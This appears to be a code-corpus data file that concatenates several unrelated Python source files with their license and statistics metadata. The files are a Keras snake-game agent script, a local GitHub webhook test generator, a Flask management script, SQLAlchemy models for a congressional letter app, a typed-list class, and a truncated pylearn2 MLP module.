from keras.optimizers import *
from qlearning4k import Agent
from lib import kerasimo
grid_size = 10
nb_frames = 4
nb_actions = 5
snake = Snake(grid_size)
model = load_model('models/snake.hdf5')
#model = Sequential()
#model.add(Conv2D(16, (3, 3), activation='relu', input_shape=(nb_frames, grid_size, grid_size)))
#model.add(Conv2D(32, (3, 3), activation='relu'))
#model.add(Flatten())
#model.add(Dense(256, activation='relu'))
#model.add(Dense(nb_actions))
#model.compile(RMSprop(), 'MSE')
agent = Agent(model=model, memory_size=-1, nb_frames=nb_frames)
#model.save('/tmp/snake1.hdf5')
#agent.train(snake, batch_size=64, nb_epoch=10000, gamma=0.8)
#model.save('/tmp/snake2.hdf5')
#agent.play(snake)
snake.reset()
agent.clear_frames()
S = agent.get_game_data(snake)
game_over = False
frames = list()
frames.append(S[0])
while not game_over:
q = model.predict(S)[0]
possible_actions = snake.get_possible_actions()
q = [q[i] for i in possible_actions]
action = possible_actions[np.argmax(q)]
snake.play(action)
S = agent.get_game_data(snake)
frames.append(S[0])
game_over = snake.is_over()
print(np.asarray(frames).shape)
kerasimo.ToSVG('snake', model, np.array(frames), showarrows=False, columns=[1,3,3,10,10,1])
|
mit
| -1,961,486,161,902,618,600
| 28.688889
| 96
| 0.719311
| false
| 2.656064
| false
| false
| false
|
tasleson/lsm-ci
|
testing/github_event_gen.py
|
1
|
2009
|
"""
Used for testing the service locally
"""
import argparse
import hashlib
import hmac
import os
import requests
import json
GIT_SECRET = os.getenv("GIT_SECRET", "")
PORT_NUM = os.getenv("PORT_NUM", "43301")
IP_ADDRESS = os.getenv("IP_ADDRESS", "127.0.0.1")
def gen_signature(data):
"""
Generate the signature for the data.
:param data: Data to generate signature for
:return: "sha1=<hexdigest>"
"""
h = hmac.new(GIT_SECRET.encode("utf-8"), data.encode("utf-8"), hashlib.sha1)
s = "sha1=" + h.hexdigest()
return s.encode("utf-8")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="github event creation")
parser.add_argument(
"--clone_url",
dest="clone_url",
default="https://github.com/tasleson/libstoragemgmt.git",
)
parser.add_argument("--branch", dest="branch", default="master")
parser.add_argument(
"--sha1",
dest="sha1",
default="4a956debabed9d02e7c076d85d1f2d18eb11b549",
)
args = parser.parse_args()
url = "http://%s:%s/event_handler" % (IP_ADDRESS, PORT_NUM)
head = {
"Content-type": "application/json",
"X-Hub-Signature": "",
"X-Github-Event": "pull_request",
}
body = dict()
body["pull_request"] = dict()
body["pull_request"]["base"] = dict()
body["pull_request"]["head"] = dict()
body["pull_request"]["base"]["repo"] = dict()
body["pull_request"]["head"]["repo"] = dict()
body["pull_request"]["base"]["repo"][
"full_name"
] = "libstorage/libstoragemgmt"
body["pull_request"]["head"]["repo"]["clone_url"] = args.clone_url
body["pull_request"]["head"]["sha"] = args.sha1
body["pull_request"]["head"]["ref"] = args.branch
body_json = json.dumps(body)
head["X-Hub-Signature"] = gen_signature(body_json)
response = requests.post(
url=url, headers=head, data=body_json.encode("utf-8")
)
print("status = %d" % int(response.status_code))
|
apache-2.0
| -6,225,019,245,875,923,000
| 24.75641
| 80
| 0.599303
| false
| 3.337209
| false
| false
| false
|
mfa/weight-app
|
weight/manage.py
|
1
|
1205
|
#!/usr/bin/env python
""" Part of weight_app
:copyright: (c) 2012 by Andreas Madsack.
:license: BSD, see LICENSE for more details.
"""
from flask.ext.script import Manager
from main import create_app, db
from utils import new_pw, get_emailaddress
# flask-Script
manager = Manager(create_app)
@manager.command
def createdb():
""" Create Database (with initial user)
"""
import models
db.create_all()
add_user(u'admin', email=get_emailaddress())
@manager.command
def add_user(username, email, quiet=False):
""" Adds a User to the database with a random password and prints
the random password.
"""
from models import User
if User.query.get(username):
print("User %s already exists!" % username)
return
u = User(username=username,
email=email.strip())
pw = new_pw()
u.set_password(pw)
if not quiet:
print("Password for %s set to: %s" % (username, pw))
db.session.add(u)
db.session.commit()
@manager.command
def import_from_xml(filename, username):
from utils import import_weight_from_xml
import_weight_from_xml(filename, username)
if __name__ == '__main__':
manager.run()
|
bsd-3-clause
| -5,661,920,201,830,214,000
| 23.591837
| 69
| 0.651452
| false
| 3.554572
| false
| false
| false
|
jlgoldman/writetogov
|
database/db_models.py
|
1
|
4654
|
from geoalchemy2 import Geography
from sqlalchemy.dialects import postgresql
from database import db
from util import fips
from util import text
SRID = 4326
# This table is auto-generated by shp2sql based on the TIGER shapefile
# tl_2016_us_cd115.zip (https://www.census.gov/cgi-bin/geo/shapefiles/index.php?year=2016&layergroup=Congressional+Districts+%28115%29).
# We then augment it with additional columns for state
# name and code, since by default it only includes FIPS codes.
#
# Table creation was initiated using:
# shp2pgsql -G -s 4269:4326 tl_2016_us_cd115.shp district > district_raw.sql
#
# Table altered using:
# ALTER TABLE district
# ADD COLUMN state_name character varying(50),
# ADD COLUMN state_code character varying(2),
# ADD COLUMN district_code character varying(4);
# CREATE INDEX idx_district_state_code ON district USING btree (state_code);
# CREATE INDEX idx_district_district_code ON district USING btree (district_code);
#
# Then extra columns are popualted using database/populate_district_codes.py
class District(db.Model):
gid = db.Column(db.Integer, primary_key=True)
statefp = db.Column(db.String(2), index=True) # FIPS code
cd115fp = db.Column(db.String(2), index=True) # FIPS code
# Added manually
state_name = db.Column(db.String(50))
state_code = db.Column(db.String(2), index=True)
district_code = db.Column(db.String(4), index=True)
geoid = db.Column(db.String(4))
namelsad = db.Column(db.String(41))
lsad = db.Column(db.String(2))
cdsessn = db.Column(db.String(3))
mtfcc = db.Column(db.String(5))
funcstat = db.Column(db.String(1))
aland = db.Column(postgresql.DOUBLE_PRECISION)
awater = db.Column(postgresql.DOUBLE_PRECISION)
intptlat = db.Column(db.String(11))
intptlon = db.Column(db.String(12))
geog = db.Column(Geography('MultiPolygon', srid=SRID))
class Rep(db.Model):
class Chamber(object):
HOUSE = 'h'
SENATE = 's'
class Status(object):
ACTIVE = 'a'
LEFT_CONGRESS = 'l'
DEFEATED_IN_GENERAL = 'd'
DEFEATED_IN_PRIMARY = 'e'
RETIRING = 'r'
SEEKING_OTHER_OFFICE = 'o'
PENDING_RESULT = 'p'
rep_id = db.Column(db.Integer, primary_key=True)
first_name = db.Column(db.String(100))
last_name = db.Column(db.String(100))
state_code = db.Column(db.String(2), index=True)
district_number = db.Column(db.Integer, index=True)
district_code = db.Column(db.String(4), index=True)
party_code = db.Column(db.String(1), index=True)
chamber = db.Column(db.String(1), index=True)
email_link = db.Column(db.String(100))
email = db.Column(db.String(100))
website = db.Column(db.String(255))
address_dc = db.Column(db.String(255))
phone_dc = db.Column(db.String(20))
bioguide_id = db.Column(db.String(10))
status = db.Column(db.String(1), index=True)
status_note = db.Column(db.String(100))
def state_name(self):
return fips.get_state_name_for_code(self.state_code)
def district_ordinal(self):
if self.chamber == self.Chamber.HOUSE:
return text.ordinal(self.district_number) if self.district_number > 0 else 'At-Large'
return None
class Reminder(db.Model):
class Frequency(object):
WEEKLY = 'w'
MONTHLY = 'm'
class Status(object):
ACTIVE = 'a'
UNSUBSCRIBED = 'u'
reminder_id = db.Column(db.BigInteger, primary_key=True)
email = db.Column(db.String(100), index=True)
frequency = db.Column(db.String(1), index=True)
status = db.Column(db.String(1), index=True)
last_contacted = db.Column(db.DateTime(timezone=True), index=True)
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
class RepMailing(db.Model):
rep_mailing_id = db.Column(db.BigInteger, primary_key=True)
rep_id = db.Column(db.Integer, index=True)
email = db.Column(db.String(100), index=True)
stripe_charge_id = db.Column(db.String(50), index=True)
lob_letter_id = db.Column(db.String(50), index=True)
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
class Issue(db.Model):
issue_id = db.Column(db.BigInteger, primary_key=True)
creator_email = db.Column(db.String(100), index=True)
creator_name = db.Column(db.String(100))
title = db.Column(db.String(100))
description = db.Column(db.Text)
rep_ids = db.Column(postgresql.ARRAY(db.Integer))
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
|
bsd-3-clause
| 6,247,504,885,244,312,000
| 37.783333
| 136
| 0.68049
| false
| 3.026008
| false
| false
| false
|
zbraniecki/pyast
|
pyast/typedlist.py
|
1
|
4961
|
import sys
import re
# Temporary solution for string/unicode in py2 vs py3
if sys.version >= '3':
basestring = str
class TypedList(list):
"""Strongly typed list
All elements of the list must be one of the given types.
Attributes:
init - initial values
types - allowed types
null - can the list be null
Types may be either classes or strings. If types are strings then the value
of the field may be only a string matching one of the types.
examples:
TypedList([Identifier(), Identifier()], (Identifier, Literal))
TypedList([], Expression, null=True)
ast.field(["+","-","+"], ("+","-","="))
"""
_type = 'class' # class | str | pattern
def __init__(self, types, init=None, null=False):
super(TypedList, self).__init__()
if isinstance(types, basestring) or not hasattr(types, '__iter__'):
self._types = (types,)
else:
self._types = types
tset = set([type(t) for t in self._types])
self._null = null
if len(tset) == 1:
tset = tset.pop()
self.__enforceType = self.__selectEnforcementMethod(tset)
else:
self.__enforceType = self.__enforceTypeMixed
if init:
self.extend(init)
elif null is False:
raise TypeError("This list must not be empty")
def __repr__(self, template=None):
#fields = self._fields
#if len(field) >= len(list_template):
# list_template += [getfillvalue(self, i)] * (len(field)-len(list_template)+1)
# fields[i] = ''.join(['%s%s' % x for x in zip_longest(
# list_template,
# map(stringify, field),
# fillvalue=''
# )])
#else:
# fields[i] = ', '.join(map(stringify, field))
#return self._template % fields
if template is None:
return list.__repr__(self)
else:
s = template()
return s
def __selectEnforcementMethod(self, t):
if issubclass(t, (basestring, int)):
return self.__enforceTypeStrInt
elif t is re._pattern_type:
return self.__enforceTypePattern
elif isinstance(t, type):
return self.__enforceTypeClass
def __enforceTypeMixed(self, items):
res = []
for item in items:
et = self.__selectEnforcementMethod(type(item))
res.append(et((item,)))
if all(res):
return
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypeStrInt(self, items):
if all(i in self._types for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypeClass(self, items):
if all(isinstance(i, self._types) for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypePattern(self, items):
if all(any(j.match(i) for j in self._types) for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def append(self, item):
self.__enforceType((item,))
return super(TypedList, self).append(item)
def insert(self, pos, item):
self.__enforceType((item,))
return super(TypedList, self).insert(pos, item)
def extend(self, items):
self.__enforceType(items)
return super(TypedList, self).extend(items)
def pop(self, key=-1):
if self._null is False and len(self) == 1:
raise TypeError("This list must not be empty")
return super(TypedList, self).pop(key)
def __delitem__(self, k):
if self._null is False:
if type(k) is slice:
absslice = k.indices(len(self))
if absslice[1] - absslice[0] >= len(self):
raise TypeError("This list must not be empty")
elif len(self) == 1:
raise TypeError("This list must not be empty")
return list.__delitem__(self, k)
def __setitem__(self, key, value):
self.__enforceType(value if hasattr(value, '__iter__') else (value,))
return list.__setitem__(self, key, value)
def __setslice__(self, i, j, sequence):
self.__enforceType(sequence)
return list.__setslice__(self, i, j, sequence)
def __delslice__(self, i, j):
absslice = slice(i, j).indices(len(self))
if self._null is False and absslice[1] - absslice[0] >= len(self):
raise TypeError("This list must not be empty")
return list.__delslice__(self, i, j)
|
bsd-3-clause
| -4,534,332,588,961,025,000
| 33.93662
| 89
| 0.549083
| false
| 3.994364
| false
| false
| false
|
CKehl/pylearn2
|
pylearn2/models/mlp.py
|
1
|
166462
|
"""
Multilayer Perceptron
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2012-2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow", "David Warde-Farley"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import logging
import math
import operator
import sys
import warnings
import numpy as np
from theano.compat import six
from theano.compat.six.moves import reduce, xrange
from theano import config
from theano.gof.op import get_debug_values
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.sandbox.cuda.dnn import dnn_available, dnn_pool
from theano.tensor.signal.downsample import max_pool_2d
import theano.tensor as T
from pylearn2.compat import OrderedDict
from pylearn2.costs.mlp import Default
from pylearn2.expr.probabilistic_max_pooling import max_pool_channels
from pylearn2.linear import conv2d
from pylearn2.linear.matrixmul import MatrixMul
from pylearn2.model_extensions.norm_constraint import MaxL2FilterNorm
from pylearn2.models.model import Model
from pylearn2.monitor import get_monitor_doc
from pylearn2.expr.nnet import arg_of_softmax
from pylearn2.expr.nnet import pseudoinverse_softmax_numpy
from pylearn2.space import CompositeSpace
from pylearn2.space import Conv2DSpace
from pylearn2.space import Space
from pylearn2.space import VectorSpace, IndexSpace
from pylearn2.utils import function
from pylearn2.utils import is_iterable
from pylearn2.utils import py_float_types
from pylearn2.utils import py_integer_types
from pylearn2.utils import safe_union
from pylearn2.utils import safe_zip
from pylearn2.utils import safe_izip
from pylearn2.utils import sharedX
from pylearn2.utils import wraps
from pylearn2.utils import contains_inf
from pylearn2.utils import isfinite
from pylearn2.utils.data_specs import DataSpecsMapping
from pylearn2.expr.nnet import (elemwise_kl, kl, compute_precision,
compute_recall, compute_f1)
# Only to be used by the deprecation warning wrapper functions
from pylearn2.costs.mlp import L1WeightDecay as _L1WD
from pylearn2.costs.mlp import WeightDecay as _WD
from pylearn2.sandbox.rnn.models.mlp_hook import RNNWrapper
logger = logging.getLogger(__name__)
logger.debug("MLP changing the recursion limit.")
# We need this to be high enough that the big theano graphs we make
# when doing max pooling via subtensors don't cause python to complain.
# python intentionally declares stack overflow well before the stack
# segment is actually exceeded. But we can't make this value too big
# either, or we'll get seg faults when the python interpreter really
# does go over the stack segment.
# IG encountered seg faults on eos3 (a machine at LISA labo) when using
# 50000 so for now it is set to 40000.
# I think the actual safe recursion limit can't be predicted in advance
# because you don't know how big of a stack frame each function will
# make, so there is not really a "correct" way to do this. Really the
# python interpreter should provide an option to raise the error
# precisely when you're going to exceed the stack segment.
sys.setrecursionlimit(40000)
if six.PY3:
LayerBase = six.with_metaclass(RNNWrapper, Model)
else:
LayerBase = Model
class Layer(LayerBase):
"""
Abstract class. A Layer of an MLP.
May only belong to one MLP.
Parameters
----------
kwargs : dict
Passed on to the superclass.
Notes
-----
This is not currently a Block because as far as I know the Block interface
assumes every input is a single matrix. It doesn't support using Spaces to
work with composite inputs, stacked multichannel image inputs, etc. If the
Block interface were upgraded to be that flexible, then we could make this
a block.
"""
# This enables RNN compatibility
__metaclass__ = RNNWrapper
# When applying dropout to a layer's input, use this for masked values.
# Usually this will be 0, but certain kinds of layers may want to override
# this behaviour.
dropout_input_mask_value = 0.
def get_mlp(self):
"""
Returns the MLP that this layer belongs to.
Returns
-------
mlp : MLP
The MLP that this layer belongs to, or None if it has not been
assigned to an MLP yet.
"""
if hasattr(self, 'mlp'):
return self.mlp
return None
def set_mlp(self, mlp):
"""
Assigns this layer to an MLP. This layer will then use the MLP's
random number generator, batch size, etc. This layer's name must
be unique within the MLP.
Parameters
----------
mlp : MLP
"""
assert self.get_mlp() is None
self.mlp = mlp
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
"""
Returns monitoring channels.
Parameters
----------
state_below : member of self.input_space
A minibatch of states that this Layer took as input.
Most of the time providing state_blow is unnecessary when
state is given.
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
targets : member of self.output_space
Should be None unless this is the last layer.
If specified, it should be a minibatch of targets for the
last layer.
Returns
-------
channels : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
return OrderedDict()
def fprop(self, state_below):
"""
Does the forward prop transformation for this layer.
Parameters
----------
state_below : member of self.input_space
A minibatch of states of the layer below.
Returns
-------
state : member of self.output_space
A minibatch of states of this layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement fprop.")
def cost(self, Y, Y_hat):
"""
The cost of outputting Y_hat when the true output is Y.
Parameters
----------
Y : theano.gof.Variable
The targets
Y_hat : theano.gof.Variable
The predictions.
Assumed to be the output of the layer's `fprop` method.
The implmentation is permitted to do things like look at the
ancestors of `Y_hat` in the theano graph. This is useful for
e.g. computing numerically stable *log* probabilities when
`Y_hat` is the *probability*.
Returns
-------
cost : theano.gof.Variable
A Theano scalar describing the cost.
"""
raise NotImplementedError(
str(type(self)) + " does not implement mlp.Layer.cost.")
def cost_from_cost_matrix(self, cost_matrix):
"""
The cost final scalar cost computed from the cost matrix
Parameters
----------
cost_matrix : WRITEME
Examples
--------
>>> # C = model.cost_matrix(Y, Y_hat)
>>> # Do something with C like setting some values to 0
>>> # cost = model.cost_from_cost_matrix(C)
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"mlp.Layer.cost_from_cost_matrix.")
def cost_matrix(self, Y, Y_hat):
"""
The element wise cost of outputting Y_hat when the true output is Y.
Parameters
----------
Y : WRITEME
Y_hat : WRITEME
Returns
-------
WRITEME
"""
raise NotImplementedError(
str(type(self)) + " does not implement mlp.Layer.cost_matrix")
def set_weights(self, weights):
"""
Sets the weights of the layer.
Parameters
----------
weights : ndarray
A numpy ndarray containing the desired weights of the layer. This
docstring is provided by the Layer base class. Layer subclasses
should add their own docstring explaining the subclass-specific
format of the ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement set_weights.")
def get_biases(self):
"""
Returns the value of the biases of the layer.
Returns
-------
biases : ndarray
A numpy ndarray containing the biases of the layer. This docstring
is provided by the Layer base class. Layer subclasses should add
their own docstring explaining the subclass-specific format of the
ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"get_biases (perhaps because the class has no biases).")
def set_biases(self, biases):
"""
Sets the biases of the layer.
Parameters
----------
biases : ndarray
A numpy ndarray containing the desired biases of the layer. This
docstring is provided by the Layer base class. Layer subclasses
should add their own docstring explaining the subclass-specific
format of the ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"set_biases (perhaps because the class has no biases).")
def get_weights_format(self):
"""
Returns a description of how to interpret the weights of the layer.
Returns
-------
format: tuple
Either ('v', 'h') or ('h', 'v').
('v', 'h') means a weight matrix of shape
(num visible units, num hidden units),
while ('h', 'v') means the transpose of it.
"""
raise NotImplementedError
def get_weight_decay(self, coeff):
"""
Provides an expression for a squared L2 penalty on the weights.
Parameters
----------
coeff : float or tuple
The coefficient on the weight decay penalty for this layer.
This docstring is provided by the Layer base class. Individual
Layer subclasses should add their own docstring explaining the
format of `coeff` for that particular layer. For most ordinary
layers, `coeff` is a single float to multiply by the weight
decay term. Layers containing many pieces may take a tuple or
nested tuple of floats, and should explain the semantics of
the different elements of the tuple.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the weight decay penalty term for this
layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement get_weight_decay.")
def get_l1_weight_decay(self, coeff):
"""
Provides an expression for an L1 penalty on the weights.
Parameters
----------
coeff : float or tuple
The coefficient on the L1 weight decay penalty for this layer.
This docstring is provided by the Layer base class. Individual
Layer subclasses should add their own docstring explaining the
format of `coeff` for that particular layer. For most ordinary
layers, `coeff` is a single float to multiply by the weight
decay term. Layers containing many pieces may take a tuple or
nested tuple of floats, and should explain the semantics of
the different elements of the tuple.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the L1 weight decay penalty term for this
layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement get_l1_weight_decay.")
def set_input_space(self, space):
"""
Tells the layer to prepare for input formatted according to the
given space.
Parameters
----------
space : Space
The Space the input to this layer will lie in.
Notes
-----
This usually resets parameters.
"""
raise NotImplementedError(
str(type(self)) + " does not implement set_input_space.")
class MLP(Layer):
"""
A multilayer perceptron.
Note that it's possible for an entire MLP to be a single layer of a larger
MLP.
Parameters
----------
layers : list
A list of Layer objects. The final layer specifies the output space
of this MLP.
batch_size : int, optional
If not specified then must be a positive integer. Mostly useful if
one of your layers involves a Theano op like convolution that
requires a hard-coded batch size.
nvis : int, optional
Number of "visible units" (input units). Equivalent to specifying
`input_space=VectorSpace(dim=nvis)`. Note that certain methods require
a different type of input space (e.g. a Conv2Dspace in the case of
convnets). Use the input_space parameter in such cases. Should be
None if the MLP is part of another MLP.
input_space : Space object, optional
A Space specifying the kind of input the MLP accepts. If None,
input space is specified by nvis. Should be None if the MLP is
part of another MLP.
input_source : string or (nested) tuple of strings, optional
A (nested) tuple of strings specifiying the input sources this
MLP accepts. The structure should match that of input_space. The
default is 'features'. Note that this argument is ignored when
the MLP is nested.
target_source : string or (nested) tuple of strings, optional
A (nested) tuple of strings specifiying the target sources this
MLP accepts. The structure should match that of target_space. The
default is 'targets'. Note that this argument is ignored when
the MLP is nested.
layer_name : name of the MLP layer. Should be None if the MLP is
not part of another MLP.
seed : WRITEME
monitor_targets : bool, optional
Default: True
If true, includes monitoring channels that are functions of the
targets. This can be disabled to allow monitoring on monitoring
datasets that do not include targets.
kwargs : dict
Passed on to the superclass.
"""
def __init__(self, layers, batch_size=None, input_space=None,
input_source='features', target_source='targets',
nvis=None, seed=None, layer_name=None, monitor_targets=True,
**kwargs):
super(MLP, self).__init__(**kwargs)
self.seed = seed
assert isinstance(layers, list)
assert all(isinstance(layer, Layer) for layer in layers)
assert len(layers) >= 1
self.layer_name = layer_name
self.layer_names = set()
for layer in layers:
assert layer.get_mlp() is None
if layer.layer_name in self.layer_names:
raise ValueError("MLP.__init__ given two or more layers "
"with same name: " + layer.layer_name)
layer.set_mlp(self)
self.layer_names.add(layer.layer_name)
self.layers = layers
self.batch_size = batch_size
self.force_batch_size = batch_size
self._input_source = input_source
self._target_source = target_source
self.monitor_targets = monitor_targets
if input_space is not None or nvis is not None:
self._nested = False
self.setup_rng()
# check if the layer_name is None (the MLP is the outer MLP)
assert layer_name is None
if nvis is not None:
input_space = VectorSpace(nvis)
# Check whether the input_space and input_source structures match
try:
DataSpecsMapping((input_space, input_source))
except ValueError:
raise ValueError("The structures of `input_space`, %s, and "
"`input_source`, %s do not match. If you "
"specified a CompositeSpace as an input, "
"be sure to specify the data sources as well."
% (input_space, input_source))
self.input_space = input_space
self._update_layer_input_spaces()
else:
self._nested = True
self.freeze_set = set([])
@property
def input_source(self):
assert not self._nested, "A nested MLP does not have an input source"
return self._input_source
@property
def target_source(self):
assert not self._nested, "A nested MLP does not have a target source"
return self._target_source
def setup_rng(self):
"""
.. todo::
WRITEME
"""
assert not self._nested, "Nested MLPs should use their parent's RNG"
if self.seed is None:
self.seed = [2013, 1, 4]
self.rng = np.random.RandomState(self.seed)
@wraps(Layer.get_default_cost)
def get_default_cost(self):
return Default()
@wraps(Layer.get_output_space)
def get_output_space(self):
return self.layers[-1].get_output_space()
@wraps(Layer.get_target_space)
def get_target_space(self):
return self.layers[-1].get_target_space()
@wraps(Layer.set_input_space)
def set_input_space(self, space):
if hasattr(self, "mlp"):
#assert self._nested
self.input_space = self.mlp.input_space
self.rng = self.mlp.rng
self.batch_size = self.mlp.batch_size
else:
self.input_space = space
self._update_layer_input_spaces()
def _update_layer_input_spaces(self):
"""
Tells each layer what its input space should be.
Notes
-----
This usually resets the layer's parameters!
"""
layers = self.layers
try:
layers[0].set_input_space(self.get_input_space())
except BadInputSpaceError as e:
raise TypeError("Layer 0 (" + str(layers[0]) + " of type " +
str(type(layers[0])) +
") does not support the MLP's "
+ "specified input space (" +
str(self.get_input_space()) +
" of type " + str(type(self.get_input_space())) +
"). Original exception: " + str(e))
for i in xrange(1, len(layers)):
layers[i].set_input_space(layers[i - 1].get_output_space())
def add_layers(self, layers):
"""
Add new layers on top of the existing hidden layers
Parameters
----------
layers : WRITEME
"""
existing_layers = self.layers
assert len(existing_layers) > 0
for layer in layers:
assert layer.get_mlp() is None
layer.set_mlp(self)
# In the case of nested MLPs, input/output spaces may have not yet
# been initialized
if not self._nested or hasattr(self, 'input_space'):
layer.set_input_space(existing_layers[-1].get_output_space())
existing_layers.append(layer)
assert layer.layer_name not in self.layer_names
self.layer_names.add(layer.layer_name)
def freeze(self, parameter_set):
"""
Freezes some of the parameters (new theano functions that implement
learning will not use them; existing theano functions will continue
to modify them).
Parameters
----------
parameter_set : set
Set of parameters to freeze.
"""
self.freeze_set = self.freeze_set.union(parameter_set)
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self, data):
# if the MLP is the outer MLP \
# (ie MLP is not contained in another structure)
if self.monitor_targets:
X, Y = data
else:
X = data
Y = None
state = X
rval = self.get_layer_monitoring_channels(state_below=X,
targets=Y)
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
state = state_below
for layer in self.layers:
# We don't go through all the inner layers recursively
state_below = state
state = layer.fprop(state)
args = [state_below, state]
if layer is self.layers[-1] and targets is not None:
args.append(targets)
ch = layer.get_layer_monitoring_channels(*args)
if not isinstance(ch, OrderedDict):
raise TypeError(str((type(ch), layer.layer_name)))
for key in ch:
value = ch[key]
doc = get_monitor_doc(value)
if doc is None:
doc = str(type(layer)) + \
".get_monitoring_channels_from_state did" + \
" not provide any further documentation for" + \
" this channel."
if layer.layer_name is not None:
doc = 'This channel came from a layer called "' + \
layer.layer_name + '" of an MLP.\n' + doc
else:
doc = 'This channel came from a pickled layer' + \
' of an MLP.\n' + doc
layer.layer_name = "pickled_pretrained"
value.__doc__ = doc
rval[layer.layer_name + '_' + key] = value
return rval
def get_monitoring_data_specs(self):
"""
Returns data specs requiring both inputs and targets.
Returns
-------
data_specs: TODO
The data specifications for both inputs and targets.
"""
if not self.monitor_targets:
return (self.get_input_space(), self.get_input_source())
space = CompositeSpace((self.get_input_space(),
self.get_target_space()))
source = (self.get_input_source(), self.get_target_source())
return (space, source)
@wraps(Layer.get_params)
def get_params(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
rval = []
for layer in self.layers:
for param in layer.get_params():
if param.name is None:
logger.info(type(layer))
layer_params = layer.get_params()
assert not isinstance(layer_params, set)
for param in layer_params:
if param not in rval:
rval.append(param)
rval = [elem for elem in rval if elem not in self.freeze_set]
assert all([elem.name is not None for elem in rval])
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeffs):
# check the case where coeffs is a scalar
if not hasattr(coeffs, '__iter__'):
coeffs = [coeffs] * len(self.layers)
layer_costs = []
for layer, coeff in safe_izip(self.layers, coeffs):
if coeff != 0.:
layer_costs += [layer.get_weight_decay(coeff)]
if len(layer_costs) == 0:
return T.constant(0, dtype=config.floatX)
total_cost = reduce(operator.add, layer_costs)
return total_cost
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeffs):
# check the case where coeffs is a scalar
if not hasattr(coeffs, '__iter__'):
coeffs = [coeffs] * len(self.layers)
layer_costs = []
for layer, coeff in safe_izip(self.layers, coeffs):
if coeff != 0.:
layer_costs += [layer.get_l1_weight_decay(coeff)]
if len(layer_costs) == 0:
return T.constant(0, dtype=config.floatX)
total_cost = reduce(operator.add, layer_costs)
return total_cost
@wraps(Model.set_batch_size)
def set_batch_size(self, batch_size):
self.batch_size = batch_size
self.force_batch_size = batch_size
for layer in self.layers:
layer.set_batch_size(batch_size)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
for layer in self.layers:
layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return get_lr_scalers_from_layers(self)
@wraps(Layer.get_weights)
def get_weights(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights()
@wraps(Layer.get_weights_view_shape)
def get_weights_view_shape(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_view_shape()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_format()
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_topo()
def dropout_fprop(self, state_below, default_input_include_prob=0.5,
input_include_probs=None, default_input_scale=2.,
input_scales=None, per_example=True):
"""
Returns the output of the MLP, when applying dropout to the input and
intermediate layers.
Parameters
----------
state_below : WRITEME
The input to the MLP
default_input_include_prob : WRITEME
input_include_probs : WRITEME
default_input_scale : WRITEME
input_scales : WRITEME
per_example : bool, optional
Sample a different mask value for every example in a batch.
Defaults to `True`. If `False`, sample one mask per mini-batch.
Notes
-----
Each input to each layer is randomly included or
excluded for each example. The probability of inclusion is independent
for each input and each example. Each layer uses
`default_input_include_prob` unless that layer's name appears as a key
in input_include_probs, in which case the input inclusion probability
is given by the corresponding value.
Each feature is also multiplied by a scale factor. The scale factor for
each layer's input scale is determined by the same scheme as the input
probabilities.
"""
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
self._validate_layer_names(list(input_include_probs.keys()))
self._validate_layer_names(list(input_scales.keys()))
theano_rng = MRG_RandomStreams(max(self.rng.randint(2 ** 15), 1))
for layer in self.layers:
layer_name = layer.layer_name
if layer_name in input_include_probs:
include_prob = input_include_probs[layer_name]
else:
include_prob = default_input_include_prob
if layer_name in input_scales:
scale = input_scales[layer_name]
else:
scale = default_input_scale
state_below = self.apply_dropout(
state=state_below,
include_prob=include_prob,
theano_rng=theano_rng,
scale=scale,
mask_value=layer.dropout_input_mask_value,
input_space=layer.get_input_space(),
per_example=per_example
)
state_below = layer.fprop(state_below)
return state_below
def masked_fprop(self, state_below, mask, masked_input_layers=None,
default_input_scale=2., input_scales=None):
"""
Forward propagate through the network with a dropout mask
determined by an integer (the binary representation of
which is used to generate the mask).
Parameters
----------
state_below : tensor_like
The (symbolic) output state of the layer below.
